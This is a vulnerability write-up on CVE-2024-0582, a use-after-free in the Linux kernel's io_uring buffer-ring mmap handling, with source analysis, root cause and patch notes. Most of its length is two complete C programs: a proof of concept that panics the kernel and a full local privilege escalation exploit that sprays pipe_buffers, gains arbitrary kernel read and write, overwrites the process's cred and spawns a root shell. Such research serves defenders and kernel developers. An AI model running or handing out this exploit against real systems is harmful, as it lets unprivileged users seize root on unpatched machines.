0x00. Before We Start

CVE-2024-0582 is a Use-After-Free vulnerability found in the Linux kernel’s io_uring subsystem, which is caused by the lack of check of the memory usage in the ring buffer. An unprivileged attacker can exploit this vulnerability by registering a ring buffer with memory allocated by IORING_REGISTER_PBUF_RING in a specific io_uring, doing the mmap then, and freeing the ring buffer. This security flaw allows an unprivileged local user to crash the system or to escalate their privileges.

The CVSS score of this vulnerability is 7.8, detailed as follow.

Score Severity Version Vector String
7.8 High 3.1 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

0x01. Analysis of the vulnerability

In this article, we will use the 6.5 version of the Linux kernel source code for our detailed analyzation.

As we all know that the IO_URING has provided us with three new system calls:

  • io_uring_setup(): This system call is used to create a new context of io_uring, which mainly consists of a SQ queue and a CQ queue with elements of a specific amount. A file descriptor will be returned to us for further operations.
  • io_uring_register(): This system call is used to configure a specific io_uring instance. Available operations include registering new buffers, updating contents of buffers and unregistering buffers, etc.
  • io_uring_enter(): This system call is used to submit a new I/O request and user can choose to synchronously wait for the I/O to be complete or not.

For the io_uring_register() syscall, its prototype is as follow:

1
2
SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
void __user *, arg, unsigned int, nr_args)

In the core function of this system call which is __io_uring_register(), there is a big switch statement for handling different opcode by calling corresponding functions. We mainly focus on the one related to the IORING_REGISTER_PBUF_RING.

PBUF_RING Internal

The pbuf (i.e., packet buffer) is a feature of the io_uring, which is somewhat a legacy concept originally coming from the network programming.

I. Ring Registration: IORING_REGISTER_PBUF_RING

The io_uring allow users to create a ring buffer with the opcode IORING_REGISTER_PBUF_RING through the io_uring_register(), which will finally calls to the function io_register_pbuf_ring() :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
struct io_buffer_list *bl, *free_bl = NULL;
int ret;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;

if (reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (reg.flags & ~IOU_PBUF_RING_MMAP)
return -EINVAL;
if (!(reg.flags & IOU_PBUF_RING_MMAP)) {
if (!reg.ring_addr)
return -EFAULT;
if (reg.ring_addr & ~PAGE_MASK)
return -EINVAL;
} else {
if (reg.ring_addr)
return -EINVAL;
}

if (!is_power_of_2(reg.ring_entries))
return -EINVAL;

/* cannot disambiguate full vs empty due to head/tail size */
if (reg.ring_entries >= 65536)
return -EINVAL;

if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) {
int ret = io_init_bl_list(ctx);
if (ret)
return ret;
}

bl = io_buffer_get_list(ctx, reg.bgid);
if (bl) {
/* if mapped buffer ring OR classic exists, don't allow */
if (bl->is_mapped || !list_empty(&bl->buf_list))
return -EEXIST;
} else {
free_bl = bl = kzalloc(sizeof(*bl), GFP_KERNEL);
if (!bl)
return -ENOMEM;
}

if (!(reg.flags & IOU_PBUF_RING_MMAP))
ret = io_pin_pbuf_ring(&reg, bl);
else
ret = io_alloc_pbuf_ring(&reg, bl);

if (!ret) {
bl->nr_entries = reg.ring_entries;
bl->mask = reg.ring_entries - 1;

io_buffer_add_list(ctx, bl, reg.bgid);
return 0;
}

kfree(free_bl);
return ret;
}

Ignoring those checkers on parameters, we now take a look at its core logic:

  • Firstly it will call io_buffer_get_list() to obtain existing io_buffer_list structure, or allocate a new one if nothing exists.
  • If the bit IOU_PBUF_RING_MMAP is set in the flag of the request, it will call io_alloc_pbuf_ring() to allocate continuous pages, otherwise the io_pin_pbuf_ring() will be called to pin pages from user space to the ring.
  • After all that have been completed, the result will be written into the io_buffer_list structure before, which will be saved into current context.

As the vulnerability happens on the code path related to the mmap(), we now mainly focus on the path calling the io_alloc_pbuf_ring() , which will finally call__get_free_pages() to allocate pages.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
size_t ring_size;
void *ptr;

ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
if (!ptr)
return -ENOMEM;

bl->buf_ring = ptr;
bl->is_mapped = 1;
bl->is_mmap = 1;
return 0;
}

The structure of the io_buffer_list is as following figure.

II. Unregistration: IORING_UNREGISTER_PBUF_RING

Corresponding to the registration, io_uring allows users to unregister a PBUF_RING with the opcode IORING_UNREGISTER_PBUF_RING , which will calls to io_unregister_pbuf_ring() to handle that.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
struct io_buffer_list *bl;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;
if (reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (reg.flags)
return -EINVAL;

bl = io_buffer_get_list(ctx, reg.bgid);
if (!bl)
return -ENOENT;
if (!bl->is_mapped)
return -EINVAL;

__io_remove_buffers(ctx, bl, -1U);
if (bl->bgid >= BGID_ARRAY) {
xa_erase(&ctx->io_bl_xa, bl->bgid);
kfree(bl);
}
return 0;
}

Its core logics are:

  • Firstly it will call the io_buffer_get_list() to obtain existing io_buffer_list structure, if nothing exists it will return.
  • Then it will call the __io_remove_buffers() to release pages stored in the io_buffer_list structure.
  • Finally it will call the xa_erase() to remove this io_buffer_list from our context and release it as well.

Before we take a look into the __io_remove_buffers(), let’s firstly have a quick look at the io_alloc_pbuf_ring(). We can notice that some members of the io_buffer_list are assigned with specific values.

1
2
3
4
5
6
static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
/* ... */
bl->is_mapped = 1;
bl->is_mmap = 1;

Hence we will go into this path in the __io_remove_buffers() to release pages we allocated before.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static int __io_remove_buffers(struct io_ring_ctx *ctx,
struct io_buffer_list *bl, unsigned nbufs)
{
unsigned i = 0;

/* shouldn't happen */
if (!nbufs)
return 0;

if (bl->is_mapped) {
i = bl->buf_ring->tail - bl->head;
if (bl->is_mmap) {
struct page *page;

page = virt_to_head_page(bl->buf_ring);
if (put_page_testzero(page))
free_compound_page(page);
bl->buf_ring = NULL;
bl->is_mmap = 0;
} /* ... */
}

In newer version of this function the put_page_testzero() will be replaced by folio_put(virt_to_folio(bl->buf_ring)); , but the core logics of them are the same.

III. Usage: io_uring_mmap

How can we access these pages in the PBUF_RING? An easy way is to do the mmap() on the io_uring, which will call to the function io_uring_mmap().

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
{
size_t sz = vma->vm_end - vma->vm_start;
unsigned long pfn;
void *ptr;

ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
if (IS_ERR(ptr))
return PTR_ERR(ptr);

pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
}

//...

static const struct file_operations io_uring_fops = {
.release = io_uring_release,
.mmap = io_uring_mmap,

In the function io_uring_validate_mmap_request() it will firstly determine the specific operation by the offset parameter of the mmap() syscall, which means that this value is not the legacy offset, but using higher bits as the type and lower bits as the value. We mainly focus on the path related to the PBUF_RING.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
static void *io_uring_validate_mmap_request(struct file *file,
loff_t pgoff, size_t sz)
{
struct io_ring_ctx *ctx = file->private_data;
loff_t offset = pgoff << PAGE_SHIFT;
struct page *page;
void *ptr;

/* Don't allow mmap if the ring was setup without it */
if (ctx->flags & IORING_SETUP_NO_MMAP)
return ERR_PTR(-EINVAL);

switch (offset & IORING_OFF_MMAP_MASK) {
case IORING_OFF_SQ_RING:
case IORING_OFF_CQ_RING:
ptr = ctx->rings;
break;
case IORING_OFF_SQES:
ptr = ctx->sq_sqes;
break;
case IORING_OFF_PBUF_RING: {
unsigned int bgid;

bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT;
mutex_lock(&ctx->uring_lock);
ptr = io_pbuf_get_address(ctx, bgid);
mutex_unlock(&ctx->uring_lock);
if (!ptr)
return ERR_PTR(-EINVAL);
break;
}
default:
return ERR_PTR(-EINVAL);
}

page = virt_to_head_page(ptr);
if (sz > page_size(page))
return ERR_PTR(-EINVAL);

return ptr;
}

The logic of io_pbuf_get_address is much simpler, which just take our buf_ring allocated before.

1
2
3
4
5
6
7
8
9
10
void *io_pbuf_get_address(struct io_ring_ctx *ctx, unsigned long bgid)
{
struct io_buffer_list *bl;

bl = io_buffer_get_list(ctx, bgid);
if (!bl || !bl->is_mmap)
return NULL;

return bl->buf_ring;
}

Root Cause

After the code analysis above, we can easily realize that the code of releasing a PBUF_RING lacks of a checker on the mmap(), which means that we can still access these freed pages by the memory-mapped region after releasing the ring buffer , leading to the use-after-free vulnerability.

Proof Of Concept

Following code is a proof of concept written by me. This program just simply exploits the UAF vulnerability to overwrite the seq_file::seq_operations to cause the kernel panic. Note that you will need to compile it together with the liburing library.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
/**
* Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <liburing.h>
#include <sys/mman.h>
#include <sys/user.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESSS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

struct io_uring_buf_ring*
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
int bgid, unsigned int flags, int *retp)
{
struct io_uring_buf_ring *buf_ring;
struct io_uring_buf_reg buf_reg;
size_t ring_size;
off_t offset;
int ret;

memset(&buf_reg, 0, sizeof(buf_reg));

/* we don't need to set reg.addr for IOU_PBUF_RING_MMAP */
buf_reg.ring_entries = ring_entries;
buf_reg.bgid = bgid;
buf_reg.flags = IOU_PBUF_RING_MMAP;

ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
if (ret) {
puts(ERR_MSG("[x] Error occur while doing io_uring_register_buf_ring"));
*retp = ret;
return NULL;
}

/**
[chr(int(i,16))for i in['3361626e74747261'[i:i+2]for i in range(0,16,2)]][::-1]
**/
offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
ring_size = ring_entries * sizeof(struct io_uring_buf);
buf_ring = mmap(
NULL,
ring_size,
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
ring->ring_fd,
offset
);

if (IS_ERR(buf_ring)) {
puts(ERR_MSG("[x] Error occur while doing mmap() for io_uring"));
*retp = PTR_ERR(buf_ring);
return NULL;
}

*retp = 0;
return buf_ring;
}

#define NR_PAGES 1
#define NR_BUFFERS 0x100
#define SEQ_FILE_NR 0x200

void proof_of_concept(void)
{
struct io_uring ring;
void **buffers;
int seq_fd[SEQ_FILE_NR], found = 0;
int ret;

puts(SUCCESSS_MSG("-------- CVE-2024-0582 Proof-of-concet --------"));
puts(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------"));
puts(SUCCESSS_MSG("-----------------------------------------------\n"));

puts("[*] Preparing...");

bind_core(0);

if (io_uring_queue_init(4, &ring, 0) < 0) {
perror(ERR_MSG("[x] Unable to init for io_uring queue"));
exit(EXIT_FAILURE);
}

puts("[*] Allocating pbuf ring and doing mmap()...");

buffers = calloc(NR_BUFFERS, sizeof(void*));
for (int i = 0; i < NR_BUFFERS; i++) {
buffers[i] = setup_pbuf_ring_mmap(
&ring,
NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
i,
0,
&ret
);
if (ret) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}

io_uring_buf_ring_init(buffers[i]);
}

puts("[*] Triggering page-level UAF vulnerabilities...");

for (int i = 0; i < NR_BUFFERS; i++) {
ret = io_uring_unregister_buf_ring(&ring, i);
if (ret) {
printf(
ERR_MSG("[x] Unable to unregister") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}

puts("[*] Reallocating page into seq_file::seq_operations...");

for (int i = 0; i < SEQ_FILE_NR; i++) {
if ((seq_fd[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
printf(
ERR_MSG("[x] Unable to open") " No.%d "
ERR_MSG("seq file, error code: ") "%d\n",
i,
seq_fd[i]
);
exit(EXIT_FAILURE);
}
}

puts("[*] Checking data leak and overwriting...");

for (int i = 0; i < NR_BUFFERS; i++) {
uint64_t *buffer = buffers[i];
for (int j = 0; j < (NR_PAGES * PAGE_SIZE / sizeof(uint64_t)); j++) {
if (buffer[j]>0xffffffff80000000 && buffer[j]<0xfffffffff0000000) {
printf(
SUCCESSS_MSG("[+] Got kernel data leak:") " %lx "
SUCCESSS_MSG("at location ") "%d-%d\n",
buffer[j],
i,
j
);
buffer[j] = *(uint64_t*) "arttnba3";
found = 1;
goto out;
}
}
}

if (!found) {
puts(ERR_MSG("[x] Failed to reallocate UAF page as seq_operations!"));
exit(EXIT_FAILURE);
}

out:
puts("[*] Triggering kernel panic...");

sleep(1);

for (int i = 0; i < SEQ_FILE_NR; i++) {
char buf[0x1000];
read(seq_fd[i], buf, 1);
}

puts("[?] So you're still alive here!?");
system("/bin/sh");
}

int main(int argc, char **argv, char **envp)
{
proof_of_concept();
return 0;
}

0x02. Exploitation

As the vulnerability has provided us with the capability to read and write the use-after-free memory with almost no limits. It is very easy to be exploited with many of different techniques.

Following exploitation program is written by me, which reallocates the UAF page as pipe_buffer to grant attackers with the capability to do the arbitrary kernel memory read & write by overwriting the pipe_buffer::page. This exploitation uses such capabilities to overwrite the cred of current process to complete a local privilege escalation.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
/**
* Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdarg.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <liburing.h>
#include <sys/mman.h>
#include <sys/user.h>
#include <sys/prctl.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
uint64_t kernel_base, vmemmap_base, page_offset_base;

void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

void err_exit(const char *fmt, ...)
{
va_list args;
int ret;

va_start(args, fmt);
printf(fmt, args);
va_end(args);

fflush(stdout);
fflush(stderr);

sleep(5);

exit(EXIT_FAILURE);
}

void get_root_shell(void)
{
if(getuid()) {
puts(ERR_MSG("[x] Failed to get the root!"));
sleep(5);
exit(EXIT_FAILURE);
}

puts(SUCCESS_MSG("[+] Successful to get the root."));
puts(INFO_MSG("[*] Execve root shell now..."));

system("/bin/sh");

/* to exit the process normally, instead of potential segmentation fault */
exit(EXIT_SUCCESS);
}

struct io_uring_buf_ring*
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
int bgid, unsigned int flags, int *retp)
{
struct io_uring_buf_ring *buf_ring;
struct io_uring_buf_reg buf_reg;
size_t ring_size;
off_t offset;
int ret;

memset(&buf_reg, 0, sizeof(buf_reg));

/* we don't need to set reg.addr for IOU_PBUF_RING_MMAP */
buf_reg.ring_entries = ring_entries;
buf_reg.bgid = bgid;
buf_reg.flags = IOU_PBUF_RING_MMAP;

ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
if (ret) {
puts(ERR_MSG("[x] Error occur while doing io_uring_register_buf_ring"));
*retp = ret;
return NULL;
}

/**
[chr(int(i,16))for i in['3361626e74747261'[i:i+2]for i in range(0,16,2)]][::-1]
**/
offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
ring_size = ring_entries * sizeof(struct io_uring_buf);
buf_ring = mmap(
NULL,
ring_size,
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
ring->ring_fd,
offset
);

if (IS_ERR(buf_ring)) {
puts(ERR_MSG("[x] Error occur while doing mmap() for io_uring"));
*retp = PTR_ERR(buf_ring);
return NULL;
}

*retp = 0;
return buf_ring;
}

/**
* In my test environment, kmalloc-1k allocates from 4-page slub, so I chose 4.
* However, it might not be the same in your environment, e.g., it's 8 on my PC.
* Check your /proc/slabinfo before doing the exploitation.
*/
#define NR_PAGES 4
#define NR_BUFFERS 0x200
#define SEQ_FILE_NR 0x200
#define PIPE_SPRAY_NR 0x1F0

struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct cred {
long usage;
uint32_t uid;
uint32_t gid;
uint32_t suid;
uint32_t sgid;
uint32_t euid;
uint32_t egid;
uint32_t fsuid;
uint32_t fsgid;
};

void read_kernel_page_by_pipe(struct page*page,struct pipe_buffer*kern_pipe_buf,
int pipe_fd[2], void *buf, size_t len)
{
kern_pipe_buf->page = page;
kern_pipe_buf->offset = 0;
kern_pipe_buf->len = 0xffe;

if (read(pipe_fd[0], buf, len) != len) {
perror(ERR_MSG("[x] Unable to do reading on pipe"));
exit(EXIT_FAILURE);
}
}

void write_kernel_page_by_pipe(struct page *page,
struct pipe_buffer*kern_pipe_buf,
int pipe_fd[2], void *buf, size_t len)
{
kern_pipe_buf->page = page;
kern_pipe_buf->offset = 0;
kern_pipe_buf->len = 0;

if (write(pipe_fd[1], buf, len) != len) {
perror(ERR_MSG("[x] Unable to do writing on pipe"));
exit(EXIT_FAILURE);
}
}

void exploit(void)
{
struct io_uring ring;
void **buffers;
struct pipe_buffer *kern_pipe_buffer = NULL;
uint64_t kernel_leak;
int pipe_fd[PIPE_SPRAY_NR][2], victim_idx = -1;
uint32_t uid, gid;
uint64_t cred_kaddr, cred_kpage_addr;
struct cred *cred_data;
char buf[0x1000];
int ret;

puts(SUCCESS_MSG("-------- CVE-2024-0582 Exploitation --------") "\n"
INFO_MSG("-------- Author: ")"arttnba3"INFO_MSG(" --------") "\n"
SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));

bind_core(0);

puts("[*] Initializing io_uring ...");

if (io_uring_queue_init(4, &ring, 0) < 0) {
perror(ERR_MSG("[x] Unable to init for io_uring queue"));
exit(EXIT_FAILURE);
}

puts("[*] Allocating pbuf ring and doing mmap() ...");

buffers = calloc(NR_BUFFERS, sizeof(void*));
for (int i = 0; i < NR_BUFFERS; i++) {
buffers[i] = setup_pbuf_ring_mmap(
&ring,
NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
i,
0,
&ret
);
if (ret) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}

io_uring_buf_ring_init(buffers[i]);
}

puts("[*] Triggering page-level UAF vulnerabilities ...");

for (int i = 0; i < NR_BUFFERS; i += 2) { /* we neeed "holes" */
ret = io_uring_unregister_buf_ring(&ring, i);
if (ret) {
printf(
ERR_MSG("[x] Unable to unregister") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}

puts("[*] Reallocating pages as pipe_buffers ...");

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
if ((ret = pipe(pipe_fd[i])) < 0) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pipe, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}

puts("[*] Allocating pipe_buffer::page ...");

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
}

puts("[*] Checking for UAF mmap address ...");

for (int i = 0; i < NR_BUFFERS; i += 2) {
uint64_t *buffer = buffers[i];
for (int j = 0; j < (NR_PAGES * PAGE_SIZE / sizeof(uint64_t)); j++) {
if (buffer[j] > 0xffff000000000000
&& buffer[j + 1] == 0x2000000000
&& buffer[j + 2] > 0xffffffff81000000) {
printf(
SUCCESS_MSG("[+] Got kernel pipe_buffer mapped at buffer:")
" %d-%d\n", i, j
);
printf(
INFO_MSG("[*] Leak pipe_buffer::page = ")"%lx\n", buffer[j]
);
printf(
INFO_MSG("[*] Leak pipe_buffer::ops = ")"%lx\n", buffer[j+2]
);
kern_pipe_buffer = (void*) &buffer[j];
goto out_find_pipe;
}
}
}

if (!kern_pipe_buffer) {
puts(ERR_MSG("[x] Failed to find kernel pipe_buffer in user space!"));
exit(EXIT_FAILURE);
}

out_find_pipe:

puts("[*] Overwriting victim pipe_buffer::page ...");
/* note that the granularity of KASLR is 256MB, i.e. 0x10000000*/
vmemmap_base = (uint64_t) kern_pipe_buffer->page & KASLR_MASK;
kern_pipe_buffer->page = (void*) (vmemmap_base + 0x9d000 / 0x1000 * 0x40);

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
read(pipe_fd[i][0], &kernel_leak, sizeof(kernel_leak));
if (kernel_leak != *(uint64_t*) "arttnba3") {
printf(SUCCESS_MSG("[+] Got victim pipe at idx: ") "%d\n", i);
victim_idx = i;
break;
}
}

if (victim_idx == -1) {
puts(ERR_MSG("[x] Failed to find the victim pipe!"));
exit(EXIT_FAILURE);
}

for (uint64_t loop_nr = 0; 1; loop_nr++) {
if (kernel_leak > 0xffffffff81000000
&& (kernel_leak & 0xfff) < 0x100) {
kernel_base = kernel_leak & 0xfffffffffffff000;
if (loop_nr != 0) {
puts("");
}
printf(
INFO_MSG("[*] Leak secondary_startup_64 : ") "%lx\n",kernel_leak
);
printf(SUCCESS_MSG("[+] Got kernel base: ") "%lx\n", kernel_base);
printf(SUCCESS_MSG("[+] Got vmemmap_base: ") "%lx\n", vmemmap_base);
break;
}

for (int i = 0; i < 80; i++) {
putchar('\b');
}
printf(
"[No.%ld loop] Got unmatched data: %lx, keep looping...",
loop_nr,
kernel_leak
);

vmemmap_base -= KASLR_GRANULARITY;
read_kernel_page_by_pipe(
(void*) (vmemmap_base + 0x9d000 / 0x1000 * 0x40),
kern_pipe_buffer,
pipe_fd[victim_idx],
&kernel_leak,
sizeof(kernel_leak)
);
}

puts("[*] Finding task_struct of current process in kernel space ...");

prctl(PR_SET_NAME, "rat3bant");
uid = getuid();
gid = getgid();

for (int i = 0; 1; i++) {
uint64_t *comm_addr;

read_kernel_page_by_pipe(
(void*) (vmemmap_base + 0x40 * i),
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xff8
);

comm_addr = memmem(buf, 0xff0, "rat3bant", 8);

if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
&& (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
&& (comm_addr[-2] == comm_addr[-3])) { /* should be equal */

printf(
SUCCESS_MSG("[+] Found task_struct on page: ") "%lx\n",
(vmemmap_base + i * 0x40)
);
printf(SUCCESS_MSG("[+] Got cred address: ") "%lx\n",comm_addr[-2]);

cred_kaddr = comm_addr[-2];
cred_data = (void*) (buf + (cred_kaddr & (PAGE_SIZE - 1)));
page_offset_base = cred_kaddr & KASLR_MASK;

while (1) {
cred_kpage_addr = vmemmap_base + \
(cred_kaddr - page_offset_base) / 0x1000 * 0x40;

read_kernel_page_by_pipe(
(void*) cred_kpage_addr,
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xffe
);
if (cred_data->uid == uid
&& cred_data->gid == gid) {
printf(
SUCCESS_MSG("[+] Found cred on page: ") "%lx\n",
cred_kpage_addr
);
break;
}

page_offset_base -= KASLR_GRANULARITY;
}

break;
}
}

puts("[*] Overwriting cred and granting root privilege...");

cred_data->uid = 0;
cred_data->gid = 0;

write_kernel_page_by_pipe(
(void*) cred_kpage_addr,
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xff0
);

setresuid(0, 0, 0);
setresgid(0, 0, 0);

get_root_shell();
}

int main(int argc, char **argv, char **envp)
{
exploit();
return 0;
}

0x03. Patch

This vulnerability got fixed with the commit c392cbecd8eca4c53f2bf508731257d9d0a21c2d, which has done the following patches:

  • Add a linked list to record corresponding data for the delay release.
  • Delay the release of the ring buffer to the time of closing the io_uring (i.e., calling the file_operations::release() in kernel), hence the memory will be reclaimed only after the mmap() region was destroyed.

0xFF. Reference